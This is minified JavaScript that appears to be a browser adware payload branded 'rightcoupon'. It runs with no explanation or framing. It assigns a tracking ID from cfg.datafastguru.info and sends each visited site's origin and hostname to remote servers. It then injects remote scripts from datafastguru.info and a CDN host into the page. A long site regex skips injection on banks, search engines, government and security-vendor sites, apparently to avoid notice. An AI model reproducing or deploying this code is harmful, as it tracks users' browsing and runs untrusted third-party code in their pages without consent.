sessionStorage.fopwdby=(window['__rvzfrrstfr'] && window['__rvzfrrstfr'].product_name ) || '';
var a=document.getElementsByTagName('head')[0].appendChild(document.createElement('style'));a.type='text/css';a.innerHTML='.foforever{display:block!important;}';
new function(){function c(a,d){var b=null;if(window.XDomainRequest){b=new XDomainRequest;b.onload=function(){a&&a(b.responseText)};var c=function(){d&&d(b.status)};b.onerror=c;b.ontimeout=c;b.onprogress=function(){}}else b=new XMLHttpRequest,b.onreadystatechange=function(){4==b.readyState&&(200==b.status?a&&a(b.responseText):d&&d(b.status))};return b}function g(){var a=c(function(a){localStorage.fouhid=a});a.open("GET","http://cfg.datafastguru.info/generatehid?partid="+sessionStorage.fopartid+"&subid="+
sessionStorage.fosubid,!0);a.send(null)}function h(){var a=c(function(a){a=JSON.parse(a);var b=document.getElementsByTagName("head")[0].appendChild(document.createElement("script"));b.src="http://pstatic.datafastguru.info/fo/ecom/lang.js?c="+a.country.toLowerCase();a=-1<navigator.userAgent.indexOf("MSIE 8.0")?"1386235369226ie":k<l?"2_3_539":"2_3_535";b=document.getElementsByTagName("head")[0].appendChild(document.createElement("script"));b.src="http://pstatic.datafastguru.info/rss/min/fo.min.js?v="+
a+"&b=rightcoupon&l=slimright";b=document.getElementsByTagName("head")[0].appendChild(document.createElement("script"));b.src="http://pstatic.datafastguru.info/wl/min/wl.js?v=139254389101";b=document.getElementsByTagName("head")[0].appendChild(document.createElement("script"));b.src="http://jsgnr.cgisoft.netdna-cdn.com/site-classification";localStorage.fouhid&&0!=localStorage.fouhid.length&&"undefined"!=localStorage.fouhid||g();__tash.rs={fosubid:"2222-5515",fopartid:"revz",fobn:"rightcouponName",fobl:"rightcouponLink",
foc:"$country"}});a.open("GET","http://static.datafastguru.info/fo/country.js",!0);a.send(null)}function e(){var a=window.location.host.toLowerCase();/tube|shopzilla.|beso.|kelkoo.|orange.|clickjogos|gameforge|pole-emploi|infojobs|snap.do|(stockinvestingbasics|allmyvideos|laposte|megafilmeshd|vidspot).net|(collectivites|sweet|jeux|voila|bilansgratuits|habbol|vente).fr|(abril|terra|ig|blogspot|hotelurbano|uol).com.br|www.easymobility.co.uk|gov.br|wikipedia.org|(pricegrabber|spardeingeld|snapdo|speedbit|loopnet|stackoverflow|stackexchange|hulu|bloomberg|blogger|dartybox|alexa|baidu|cj|cnn|facebook|flickr|history|hotmail|imdb|imvu|linkedin|microsoft|msn|myspace|netflix|nytimes|politico|picasa|pinterest|rue89|salon|searchenginewatch|delta-search|sfgate|shutterfly|techcrunch|verizon|venturebeat|wired|yankodesign|yahoo|youtube|bing|vk|live|tumblr|ask|apple|roblox|411answers|tagged|nickjr|opposingviews|truste|adobe|breakfastdailynews|.avg|espn.go|.aol|pogo|pornhub|youporn|pron|youjizz|xnxx|marca|elpais|juegos|surveysresearchgroup|dofus|adopteunmec|unique|22find|nationzoom|sncf|privee|awesomehp|updateflashplayer|stocktradingcenters|empowernetwork|regionalhealthreview|diyfood|websurveycentral|\.att|news788|411source|pandora|hsselite|verizonwireless|internetautoguide|symantec|\.pch|mobile|nortonpro|pchealthboost|voipo|contenko|seaworldparks|entrepreneur|ratezip|game321|boostmobile|cabelas|specialk|globo|yepi|jogatina|4shared|globo|ojogos|tudogostoso|netcartas|disney|voeazul|cartoonnetwork|\.tam|viajanet|vagalume|jogosdemeninas|^as|\.as|atrapalo|elconfidencial|lavanguardia|forocoches|peliculasyonkis|logitravel|freakshare|elperiodico|iberia|filmaffinity|chaturbate|expansion|todotest|antena3|cincodias).com|(elmundo|rtve|lavozdegalicia|sport|publico|game|online|eldiariomontanes|elcomercio|\.hoy|\.abc|telepizza|europapress).es|paypal|cam4|888poker|filmesonlinegratis|google|.gov|qvo6|cam4|surveyservers|ask.fm|games.la|jeu.info/i.test(a)||
h()}function f(){if("undefined"!=typeof __tash.bla&&__tash.bla.test(window.location.hostname)){var a=c(function(a){!1!==JSON.parse(a).found&&e()},function(){e()});a.open("GET","http://cwbl.datafastguru.info/search/"+m,!0);a.timeout=1E3;a.send()}else e()}function n(){if(sessionStorage.forcc)window.setTimeout(function(){delete sessionStorage.forcc},5E3);else if("/"==window.location.pathname){var a=c(function(a){0<a||f()});window.location.origin||(window.location.origin=window.location.protocol+"//"+
window.location.hostname+(window.location.port?":"+window.location.port:""));a.open("GET","http://capp.datafastguru.info/api/count/coupons?q="+encodeURIComponent(window.location.origin),!0);a.send(null)}else p?f():e()}if(window==top){"undefined"==typeof __tash&&(window.__tash={});var k=Math.random(),l=1,m=window.location.host.toLowerCase(),p=!1;n()}};

new function(){function d(a,e){var b=null;if(window.XDomainRequest){b=new XDomainRequest;b.onload=function(){a&&a(b.responseText)};var f=function(){e&&e(b.status)};b.onerror=f;b.ontimeout=f;b.onprogress=function(){}}else b=new XMLHttpRequest,b.onreadystatechange=function(){4==b.readyState&&(200==b.status?a&&a(b.responseText):e&&e(b.status))};return b}function l(){var a=d(function(a){localStorage.fouhid=a});a.open("GET","http://cfg.datafastguru.info/generatehid",!0);a.send(null)}function g(){var a;
a=m<n?"1_0_17":"1_0_13";localStorage.fouhid&&0!=localStorage.fouhid.length&&"undefined"!=localStorage.fouhid||l();__tash.cpn={fosubid:"2222-5515",fopartid:"revz",fobn:"rightcouponName",fobl:"rightcouponLink",foc:"$country"};document.getElementsByTagName("head")[0].appendChild(document.createElement("script")).src="http://pstatic.datafastguru.info/crss/min/fo.min.js?v="+a+"&b=rightcoupon"}function h(){var a=d(function(a){0<a&&g()});window.location.origin||(window.location.origin=window.location.protocol+"//"+window.location.hostname+
(window.location.port?":"+window.location.port:""));a.open("GET","http://capp.datafastguru.info/api/count/coupons?v=1&q="+encodeURIComponent(window.location.origin),!0);a.send(null)}function k(){var a=window.location;if("/"==a.pathname||""==a.pathname)h();else{var e=a.pathname,a="http://cddata.datafastguru.info/site-classification/site/"+a.hostname,b=d(function(a){if(a&&(a=JSON.parse(a).jqxgridHomepage)&&a.length)for(var b=0;b<a.length;b++){var c=a[b].text,d=document.createElement("a");d.href=c;if(d.pathname==
e){h();break}}});b.open("GET",a,!0);b.send(null)}}if(window==top){"undefined"==typeof __tash&&(window.__tash={});var m=Math.random(),n=1;if(sessionStorage.forcc)g();else{var c=document.createElement("script");c.addEventListener?c.addEventListener("load",k,!1):c.readyState&&(s.onreadystatechange=k);c.src="http://jsgnr.cgisoft.netdna-cdn.com/site-classification";document.getElementsByTagName("head")[0].appendChild(c)}}};
